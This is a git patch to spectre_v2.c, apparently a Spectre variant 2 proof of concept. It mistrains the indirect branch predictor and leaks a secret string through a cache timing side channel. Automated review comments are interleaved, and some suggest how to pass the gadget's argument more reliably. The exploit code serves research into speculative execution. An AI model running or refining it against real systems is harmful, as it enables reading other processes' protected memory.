From 8dbe117cb065cee7cdba925573a38ed518ef439d Mon Sep 17 00:00:00 2001
From: Samuel Aubertin
Date: Tue, 5 Apr 2022 12:44:24 +0200
Subject: [PATCH] Typos, change variable name for readability
---
 spectre_v2.c | 22 ++++++++++++----------
 1 file changed, 12 insertions(+), 10 deletions(-)
diff --git a/spectre_v2.c b/spectre_v2.c
index e16d9cf..2b5e0fc 100644
--- a/spectre_v2.c
+++ b/spectre_v2.c
@@ -26,7 +26,7 @@ char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism,
 uint64_t* target; // pointer to indirect call target
 unsigned int cache_hit_threshold, array1_size = 16;
 uint8_t unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
-uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
+//uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
 uint8_t channel[256 * GAP]; // side channel to extract secret phrase
 // mistrained target of indirect call
@@ -44,15 +44,15 @@ safe_target(char* addr)
 }
 // function that makes indirect call
-// note that addr will be passed to gadget via %rdi
+// note that addr will be passed to gadget via %rdi
 int
-victim_function(char* addr, int input)
+victim_function(char* addr, int input)
 {
 #pragma GCC diagnostic ignored "-Wuninitialized"
 unsigned int result, junk = junk;
 // set up branch history buffer (bhb) by performing >29 taken branches
 // see https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html
- // for details about how the branch prediction mechanism works
+ // for details about how the branch prediction mechanism works
 // junk and input used to guarantee the loop is actually run
 for (int i = 1; i <= 100; i++) {
 input += i;
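Review bot: The `temp` global is removed by commenting its declaration out rather than deleting it, which leaves dead text in a commit described as typo fixes. If nothing else references `temp` (not visible from this hunk), delete the line outright; version control keeps the history. Its comment claimed it kept `victim_function()` from being optimized away, so before relying on the removal confirm that the `return result & junk;` path in the function is still enough to force the call to be emitted at the optimization level used; the surrounding declarations continue outside the hunk.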
@@ -61,10 +61,10 @@ victim_function(char* addr, int input)
 // call *target
 __asm volatile(
 "mov %%rax, %2\n"
- "callq *%1\n"
+ "callq *%1\n"
 "mov %0, %%eax\n"
 : "=r" (result)
- : "r" (*target), "r" (addr)
+ : "r" (*target), "rm" (addr)
 : "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11");
 return result & junk;
 }
@@ -87,6 +87,7 @@ leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_thres
 channel[i * GAP] = 1;
 }
 for (tries = 999; tries > 0; tries--) {
+ // Malicious target
 *target = (uint64_t)&gadget;
 #ifndef NOMFENCE
 _mm_mfence();
@@ -94,7 +95,6 @@ leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_thres
 for (j = 50; j > 0; j--) {
 junk ^= victim_function(&dummy, 0);
 }
-
 #ifndef NOMFENCE
 _mm_mfence();
 #endif
@@ -129,7 +129,9 @@ leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_thres
 #ifndef NOMFENCE
 _mm_mfence();
 #endif
- // call victim
+ // call victim
+
+ //printf("victim with %p\n", target_addr);
 junk ^= victim_function(target_addr, 0);
 #ifndef NOMFENCE
 _mm_mfence();
@@ -165,7 +167,7 @@ main(int argc, char** argv)
 {
 int o, score[2], len = (int)strlen(secret), json = 0, successes = 0;
 uint8_t value[2];
- char* addr = secret;
+ char* secret_addr = secret;
 while ((o = getopt(argc, argv, "t:j")) != EOF) {
 switch (o) {
@@ -197,7 +199,7 @@ main(int argc, char** argv)
 }
 #endif
 while (--len >= 0) {
- leak(addr++, value, score, cache_hit_threshold);
+ leak(secret_addr++, value, score, cache_hit_threshold);
 if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
 successes++;
 fprintf(stderr, "\033[32m%c\033[0m", (value[0]));
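Review bot: The new `"rm"` constraint on `addr` lets GCC place operand 2 in memory, but the first instruction `mov %%rax, %2` in AT&T syntax has %rax as source and operand 2 as destination, so the asm stores into an input-only operand — already outside the inline-asm contract with `"r"`, and with `"rm"` it can now overwrite the compiler's own spill slot for `addr`. Nothing in either constraint delivers `addr` in %rdi as the comment on the signature promises; that only holds if the compiler happens to leave the first argument register untouched before the asm. If the gadget must receive `addr` in %rdi, say so explicitly: `: "r" (*target), "D" (addr)` and drop `"rdi"` from the clobber list, since a register holding an operand may not also be declared clobbered. The function starts outside the hunk.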
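Review bot: The added comment `// Malicious target` does not say why `*target` is pointed at `gadget` at the top of each try; from the 50 calls to `victim_function(&dummy, 0)` that follow in the next hunk this appears to be the predictor-training phase, and the comment should name it. Suggest `// Training phase: make the indirect call resolve to gadget so the predictor learns to speculate into it`, with a matching comment where `*target` is later redirected to the safe target. The enclosing `leak` function starts and ends outside the hunk.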
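Review bot: The new `//printf("victim with %p\n", target_addr);` is commented-out debug code placed between the `_mm_mfence()` and the measured `victim_function(target_addr, 0)` call; if it is ever re-enabled there, the printf's own memory traffic and system call would likely disturb the cache state the side channel is measuring. Either delete the line or keep it behind a build flag outside the fenced window, e.g. `#ifdef DEBUG_LEAK` / `fprintf(stderr, "victim with %p\n", (void*)target_addr);` / `#endif` before the first fence. Note `%p` expects a `void*`, so the cast belongs in any revived version. The enclosing `leak` function starts and ends outside the hunk.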